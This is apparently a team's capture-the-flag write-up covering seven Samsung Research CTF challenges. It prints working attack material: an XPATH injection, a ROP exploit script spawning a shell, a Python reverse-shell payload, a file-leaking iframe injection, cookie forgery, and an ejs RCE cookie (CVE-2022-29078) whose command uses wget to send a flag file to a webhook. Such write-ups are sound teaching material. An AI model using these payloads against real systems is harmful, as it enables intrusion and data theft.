This CTF was organized by Samsung Research Security Team, and was a side event of SSTF.
Tasks were divided in Tutorial and Challenges, we solved all tasks of the first section and some of the second.
We show here short writeups for all the tasks we solved from the Challenges section.

Yet Another Injection

Authors: SirFrigo & Daloski
Description: XPATH injection
Category: Web
Points: 110

SQL is not the only target of injection attacks. Note: If this challenge is too difficult for you, please revisit SQLi 101 and SQLi 102. The principle is the same as SQLi.

In the login page, we click hint which shows page source code.
Here we get already a registered user:

username: guest, pwd: guest

We also see that there are other files, paperdetail.php and library.php, and we can see their sources too!

(For example:

We login using guest:guest and we get a list of articles. Clicking on one of them will make a POST request to /paperdetail?idx=.

Analyzing library.php we see that it has a XPATH injection vulnerability on idx attribute (in getDetail function):

$query = "//Paper[Idx/text()='".$idx."' and @published='yes']";

Using 1' or @published='no']\x00 as payload allows us to see not published articles. We get just one article as response, containing the flag:



Author: Daloski
Description: Data extraction from metadata files
Category: Rev/Misc
Points: 110

I developed a simple and useful program that attaches a file into word file. But… why I cannot open file? I thought I developed perfect program, but it was not true. Wait, where is the source file? I cannot find my attachment file! I think I need to extract attachment file from word. Download:

We open the file RecoverMe.docx and double click on Open-me.bin. It will download a .tmp file.
It is an EMF file (Enhanced Metafile Format). Rename it to name.emf and open it with InkScape to get the flag!
Actually, on some OSes, you can just view the flag from the .tmp file.



Author: Shotokhan
Description: A basic ROP chain
Category: Pwn
Points: 111

A simple x86 ROP exercise for tutorial graduates. Server: nc 1337 Download:

We download the binary and run the basic static analysis on it:

$ file pppr
pppr: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/, for GNU/Linux 3.2.0, BuildID[sha1]=c8800d35a108c24d3ae283f304c14ae36cca31e6, not stripped

$ checksec pppr
    Arch:     i386-32-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

By interacting with it and by analyzing it in Ghidra, we learn that it takes at most 63 bytes from stdin and adds a null byte, and stores them into a buffer of 4 bytes.
The input is taken in a function called r, which takes three parameters: buffer, number of bytes to read, stream number.
The “stream number” parameter is not actually used to choose a stream, there is just the check that it is equal to 0.
The system function is linked in the binary, wrapped by a function called x, and there is a 128-bytes long scratch buffer in bss section called buf_in_bss.

The binary is 32-bit, so parameters are passed on the stack (we can double check this by looking at disassembly).
So, when calling system in a ROP, we have to prepare gadgets in this layout:

system | ret_addr | buf_in_bss

We can put an arbitrary ret_addr after system: if it’s called correctly, the new program will replace the running one in the process context.
We choose to use buf_in_bss as parameter for the system function because it’s easier to write a string there.
To write there, we can re-use r function, by passing as first parameter buf_in_bss, as second parameter the length of our program’s name (which will be /bin/sh, so we can pass 7 or 8 as length), and 0 as third parameter, like that:

r | ret_addr | buf_in_bss | 8 | 0

We then need a gadget to consume the three parameters after the return from the r function, and to later return to system@plt.
This gadget will be the ret_addr of r; a good one:

0x080486a9 : pop esi ; pop edi ; pop ebp ; ret

The full chain will be:

BOF | r | pop_esi_edi_ebp_ret | buf_in_bss | 8 | 0 | system | ret_addr | buf_in_bss

Where BOF is an arbitrary payload of 12 bytes, since the offset from the start of the buffer to the return address is 12 bytes.
Here is the script:

from pwn import *

def main():
    local = False
    elf = ELF("./pppr")
    if local:
        r = process(["./pppr"])
        r = remote("", 1337)
    offset = 12
    r_func = elf.symbols['r']
    pop_esi_edi_ebp_ret = 0x080486a9
    buf_in_bss = elf.symbols['buf_in_bss']
    name_len = 8
    name = b"/bin/sh"
    r_third_param = 0
    system = elf.symbols['system']
    ret_addr = elf.symbols['__libc_start_main']
    payload = b'A' * offset
    payload += p32(r_func)
    payload += p32(pop_esi_edi_ebp_ret)
    payload += p32(buf_in_bss) + p32(name_len) + p32(r_third_param)
    payload += p32(system) + p32(ret_addr) + p32(buf_in_bss)

if __name__ == "__main__":

And here is the execution:

[+] Opening connection to on port 1337: Done
[*] Switching to interactive mode
$ ls
$ cat flag.txt


Authors: SirFrigo & Daloski
Description: RCE using old version of Pillow (reverse shell)
Category: Web/Misc
Points: 111

This is yet another secure color channel mixer. Server:

We select random mode and then generate the image, then right click on the image to open it in a new tab. We get a request to (if we choose mode R):

Everything put after ?mode= is evaluated by python, so we put this payload to create a reverse shell:

exec('import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_ADDRESS",YOUR_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);pty.spawn("/bin/sh")')

Flag is in secret/flag.txt.



Author: Shotokhan
Description: AES-CTR cookie forgery
Category: Crypto/Web
Points: 118

I heared that cookie is obsolete and weak. So I made a CUstom SESsion using AES encryption. I am safe now. Note: If you don’t know how to solve this problem, it would be helpful to study RC four tutorial again.

There is a website which comes with an interface for login and registration.
When trying to register, there is an error message saying that only admin can register users.
Anyway, when looking at HTML source, we can see that there is a comment stating that you can login with the following credentials: guest / guestpassword.
At this point, after logging in, we have the following message:

Welcome, guest :)
Only admin can see the flag. Sorry.

And we have the buttons view source and logout.
Therefore we look at the source:


include "secret.php";    //server_secret, iv, flag

$cookie_name = "SESSION";

if (!isset($_COOKIE[$cookie_name])) {
    header('Location: /signin.php');

list($iv, $encrypted_session_data) = explode("|", base64_decode($_COOKIE[$cookie_name]), 2);
$session_data = openssl_decrypt($encrypted_session_data, $cipher, $server_secret, OPENSSL_RAW_DATA, $iv);
list($username, $auth_code) = explode("|", $session_data);
if ($auth_code !== $server_secret) {
    die("No hack!");

So we learn that the cookie is of the following format:



enc_session_data = AES_128_CTR(session_data, server_secret, iv, options)


session_data = username|auth_code

with auth_code = server_secret.
You can find some details about CTR mode here.
In this case, the iv is used as nonce, and it’s combined with the counter of each 16-bytes block.
Our session is:


By decoding it and inspecting it, we can see that there are 16 bytes for the iv, then the vertical bar, then other 71 bytes.
Note that the total number of bytes is not multiple of 16 because CTR mode acts “like a stream cipher”.
We know that our username is guest, so the server_secret is 65 bytes long and the 71 bytes of enc_session_data are:

AES-CTR bitstream

Note that AES requires a 16 byte key, so the server_secret is used as a passphrase to generate the key, as we can also see from PHP docs.
An interesting thing about AES-CTR is that the xor-bitstream is the same for encryption and decryption, in this way it is very similar to a stream cipher.
So, knowing part of the plaintext means that we also know the corresponding part of the xor-bitstream.
To get the flag, we need to login as admin, and luckily it has the same length of guest and needs to be in the same position in the cookie.
Therefore we can just xor the part of the cookie where the username should be with the string guest, xor the result with the string admin and encode the cookie again. The hex of the encrypted guest username is:

f5 a3 96 ee ad

After performing xor with guest and with admin, the resulting hex is:

f3 b2 9e f4 b7

Back to the cookie in base64:


Now we’re able to get the flag:


5th degree

Author: 0xDark
Description: Find min/max of function in a given range, for many rounds with a timeout
Category: Misc/Web
Points: 121

It’s highschool math. Server:

By interacting with the service, we got this message:

In the next page, you'll get an equation and range about x.
Please find minimum and maximum values of y while x is in the given range.

For your convinience, equations are designed to have integer solutions.
You should pass 30 rounds in 60 seconds.

Click the button when you're ready. 

After clicking Start button, we have the first equation, something like:

y = -949x^5 - 575473600x^4 + 1592492250118835x^3 + 1390451370472346878800x^2 + 172989325446300530746488000x + 857969

Find minimum and maximum of y, where 416978 \le x \le 763114 . 

It can either be solved analytically or with brute-force, since the range isn’t very high.
To save time, I first tried with brute-force; this is the script:

from concurrent.futures import ProcessPoolExecutor
from re import search, findall
from requests import Session

URL = ''
RE_EQ = r'\\\[([yx=\s\d\^+-]*)\\\]'
RE_DIG = r'\\\(([yx\\leg=\s\d\^+-]*)\\\)'
MIN_MAX = r'[-+\d]+'
n_process = 5

s = Session()
text = s.get(URL).text

def work(e, a, b):
	return [eval(e) for x in range(a,b)]

# We have to solve 30 problems
for _ in range(30):
	print(search(r'(Round \d*)', text)[0])

	# Extract equation & min/max from response
	equation = search(RE_EQ, text)[0][7:-3].replace('y','x').replace('x', '*x').replace('^','**')
	min_max = search(RE_DIG, text)[0]
	min_n, max_n = map(int, findall(MIN_MAX, min_max))
	# Try to calculate equation with given min/max
	r = [eval(equation) for x in (min_n, max_n)]
	text =, data={'min': min(r), 'max': max(r)}).text

	# If results were incorrect compute
	# all results in the given range
	# and take the min / max from those
	if 'please think harder' in text:
		k = abs(min_n - max_n)//n_process

		# Use multiprocess with n_process workers
		with ProcessPoolExecutor(max_workers=n_process) as pool:
			futures = []
			for i in range(min_n, max_n, k):
				f = pool.submit(work, equation, i, i+k if i+k < max_n else max_n+1)
		# Fetch returned values from the process
		r = [e for f in futures for e in f.result()]

		text =, data={'min':min(r), 'max':max(r)}).text

print('\nFlag:', search('SCTF\{.*\}', text)[0])

This approach worked, here is the flag:


Online Education

Authors: SirFrigo & Daloski
Description: Forge custom cookie using information leak from path traversal
Category: Web
Points: 139

I made an online education service! Watching education videos is so boring :( Server: Download:

The objective is to get the certificate by completing the courses and using the certificate to leak some secrets.

  1. To get the certificate we first start a course and then finish it using a negative “rate” (we out -2000). This is done with POST requests to /status, first with attribute {"action":"start"}, and then {"action":"finish", "rate":-2000}. Repeat this 3 times to finish all courses.
  2. To leak info from the certificate we use a SSTI using as email:<iframe src='file:///home/app/'></iframe>

This will put content inside the certificate pdf.
From the leak, we take the secret_key and craft a custom cookie with, writing:

  "email": "",
  "idx": 0,
  "is_admin": true,
  "name": "ciao",
  "alg": "HS256"

Then we use that cookie to get the flag in /flag.

Here is the script to leak secret_key:

import requests

base_url = ""
s = requests.Session()
name = "test"
email = "<iframe src='file:///home/app/'></iframe>"
res = + "signin", data={
    'name' : name,
    'email' : email

for _ in range(3):
    res = + "status", json={
            "action" : "start"
        headers = {
            'X-Requested-With' : 'XMLHttpRequest'

    res = + "status", json={
        "action" : "finish",
        "rate" : -2000

res = s.get(base_url + "cert")
with open("./mauro.pdf", "wb") as f:

And here is the flag:


JWT Decoder

Authors: Ve & Shotokhan
Description: Abusing CVE-2022-29078 for RCE with JWT
Category: Web
Points: 142

I am studying nodejs web programming. I wrote simple JWT decode web site with popular node packages. Using recent packages, I certain that there is no severe security issue! Server1: Server2: Download:

The service enables to modify a JWT client-side, set it as cookie and send it to the server, which renders a template with fields from the JWT.
Source code is provided, as well as package versions, Dockerfile and so on.
If we build the container image locally, we get warning for a critical vulnerability from npm audit, about the package ejs.
These are the dependencies:

  "dependencies": {
    "cookie-parser": "^1.4.6",
    "ejs": "^3.1.6",
    "express": "^4.17.3"

We can see a proof of concept for the vulnerability, which is a RCE, here.
In the proof of concept, server-side there is something like res.render('index', req.query);, whereas in our case the second parameter to the render function is the object rawJwt, as we can see in the source code of app.js:

const express = require('express');
const cookieParser = require('cookie-parser');
const path = require('path');
const app = express();
const PORT = 3000;

app.set('views', path.join(__dirname, "view"));
app.set('view engine', 'ejs');

app.get('/', (req, res) => {
    let rawJwt = req.cookies.jwt || {};

    try {
        let jwtPart = rawJwt.split('.');

        let jwtHeader = jwtPart[0];
        jwtHeader = Buffer.from(jwtHeader, "base64").toString('utf8');
        jwtHeader = JSON.parse(jwtHeader);
        jwtHeader = JSON.stringify(jwtHeader, null, 4);
        rawJwt = {
            header: jwtHeader

        let jwtBody = jwtPart[1];
        jwtBody = Buffer.from(jwtBody, "base64").toString('utf8');
        jwtBody = JSON.parse(jwtBody);
        jwtBody = JSON.stringify(jwtBody, null, 4);
        rawJwt.body = jwtBody;

        let jwtSignature = jwtPart[2];
        rawJwt.signature = jwtSignature;

    } catch(error) {
        if (typeof rawJwt === 'object') {
            rawJwt.error = error;
        } else {
            rawJwt = {
                error: error
    res.render('index', rawJwt);

app.use(function(err, req, res, next) {
    res.status(500).send('Something wrong!');

app.listen(PORT, (err) => {
    console.log(`Server is Running on Port ${PORT}`);

To try the RCE, we changed the source code by passing req.query as second parameter to render instead of rawJwt.
We also added some console.log calls to see the rawJwt at different stages and compare it to req.query.
Therefore, we can do the RCE locally with a query like this:[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('touch /tmp/ve.txt');s

The resulting req.query object is:

    "body": "ve",
    "settings": {
        "view options": {
            "outputFunctionName": "x;process.mainModule.require('child_process').execSync('touch /tmp/ve.txt');s"

The RCE part has settings as top-level key and is a nested object.
We would like to set rawJwt like that, but it is a string when read as cookie, and when it becomes an object (in the “try” block) it doesn’t set keys based on user-input, only values that are strings, anyway.

So we thought that the best idea was to make the “try” block fail before re-assigning an object to rawJwt variable, in such a way that rawJwt keeps the fields it has when read as a cookie from req.cookies.
Then, we saw that cookie-parser package is used to read cookies. By reading online documentation, we saw that cookieParser function by default tries to decode JSON cookies.
Therefore, we tried to set the cookie as JSON, but it was still parsed as string.
At this point we investigated cookie-parser source code on GitHub, and saw that a cookie is parsed as JSON only if it has the prefix j:, like you can see here.
Furthermore, the cookie’s value has to be URL encoded, obviously.
We tested the RCE with the following cookie:

j:{"settings":{"view options":{"outputFunctionName":"x;process.mainModule.require('child_process').execSync('touch /tmp/shoto.txt');s"}}}

And it worked!
Now we just have to send it to the real server, with an RCE payload to read the flag and send it to our webhook:

j:{"settings":{"view options":{"outputFunctionName":"x;process.mainModule.require('child_process').execSync('wget[REDACTED]/?flag=$(cat /flag.txt)');s"}}}

And here is the flag:
